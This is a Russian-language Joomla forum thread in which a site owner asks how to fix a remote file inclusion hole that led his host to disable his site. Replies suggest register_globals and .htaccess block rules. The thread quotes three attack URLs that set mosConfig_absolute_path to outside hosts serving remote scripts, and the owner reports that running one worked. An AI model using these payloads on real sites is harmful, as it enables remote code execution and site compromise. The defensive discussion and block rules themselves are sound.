Крупнейшая биржа рекламы в Телеграм
0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 2226 Просмотров
*

Vasabi

  • Осваиваюсь на форуме
  • 25
  • 3 / 0
Срочно нужна помощь. Не знал что у Joomla есть такое!(
Хостинг отключил сайт по причине опасности Joomla!
Написал, что на  сайте обнаружена уязвимость позволяющая запускать вредоносный код находящийся на других сайтах

Пример:
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.smolen.org/c?
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?
/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.spaminbox.xpg.com.br/vivo.txt?

Вопрос:
1. Что я сделал не правильно? Как такое могло случится?
2. Как это справить?
*

Greycat

  • Захожу иногда
  • 298
  • 64 / 0
Где именно прописаны эти ссылки, где-то на сайте?

Какая у вас версия joomla?
Я.д.=41001239962471  |  WMR=R271925495206  |  WMZ=Z144922023512
*

Vasabi

  • Осваиваюсь на форуме
  • 25
  • 3 / 0
Joomla 1.0.12 LE 2007




Эти ссылки не где не прописаны. Это мне хостинг в письме написал. Сказал, что можна запустить любой вредный скрипт по ссылке /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www………

И отключил сайт на время, пока все не отремонтирую(
« Последнее редактирование: 20.02.2008, 13:59:26 от Vasabi »
*

Vasabi

  • Осваиваюсь на форуме
  • 25
  • 3 / 0
Прошу совета, что сделать с mosConfig_absolute_path?
*

Greycat

  • Захожу иногда
  • 298
  • 64 / 0
Хостер не уточнил куда именно запускается вредоносный скрипт - на хостинг или на машину пользователя.

Если я правильно понимаю, до тех пор, пока эти ссылки не написаны на сайте, никто на них нажать не сможет.

Защититься от этого вероятно можно используя файл ".htaccess".
Я.д.=41001239962471  |  WMR=R271925495206  |  WMZ=Z144922023512
*

Greycat

  • Захожу иногда
  • 298
  • 64 / 0
Кстати, а как хостер узнал о такой "уязвимости". Это где-то как-то было использовано или это частное мнение кого-то из программеров хостера. Как они это проверяли?
Я.д.=41001239962471  |  WMR=R271925495206  |  WMZ=Z144922023512
*

drug

  • Новичок
  • 5
  • 1 / 0
Хостер не уточнил куда именно запускается вредоносный скрипт - на хостинг или на машину пользователя.

Если я правильно понимаю, до тех пор, пока эти ссылки не написаны на сайте, никто на них нажать не сможет.

Защититься от этого вероятно можно используя файл ".htaccess".

Для начала - это не ссылки. Такую команду может запустить любой любопытный пользователь с любого браузера. Тем самым он надеется подменить глабальные переменные сайта. Для защиты от таких чудаков нодо отключать register_globals = off в php.ini
*

Vasabi

  • Осваиваюсь на форуме
  • 25
  • 3 / 0
Проверял, что прислал хостинг, вводил /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?
и вправду скрипт срабатывает и выводит Opa, enviado!
На сайте установлен Artio JoomSEF и после его отключения по линку /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://www.krokrox.xpg.com.br/inbox.txt?

Джумла выводит

«У Вас нет прав для просмотра этого ресурса.
Вы должны зайти как пользователь.»

как и должно быть.

Я видно где-то намудрил. Там что-то было не правильно установлено в .htaccess
Я так понимаю, что при установке Artio JoomSEF мне нужно было прописать запрет на /index.php


Спасибо всем)
*

one_more

  • Захожу иногда
  • 139
  • 87 / 3
  • there is no spoon
В .htaccess должны присутствовать (в раскомментированном виде) такие директивы:

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a <script> tag in URL

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Send all blocked request to homepage with 403 Forbidden error!

RewriteRule ^(.*)$ index.php [F,L]

#
########## End - Rewrite rules to block out some common exploits
Errare humanum est
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Обнаружена уязвимость версий Joomla с 3.0.0 по 3.4.6

Автор vvc

Ответов: 8
Просмотров: 807
Последний ответ 23.10.2019, 21:40:57
от dmitry_stas
Критическая уязвимость Exim ((cve-2019-10149.))

Автор yuri-it

Ответов: 20
Просмотров: 681
Последний ответ 11.06.2019, 19:56:16
от Septdir
Вредоносный код в url после якоря #

Автор dm-krv

Ответов: 7
Просмотров: 606
Последний ответ 10.07.2018, 14:12:29
от dm-krv
Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 2399
Последний ответ 03.09.2017, 16:24:17
от Sorbon
Критическая уязвимость в PHPMailer

Автор b2z

Ответов: 17
Просмотров: 8412
Последний ответ 23.02.2017, 19:36:05
от bestshoko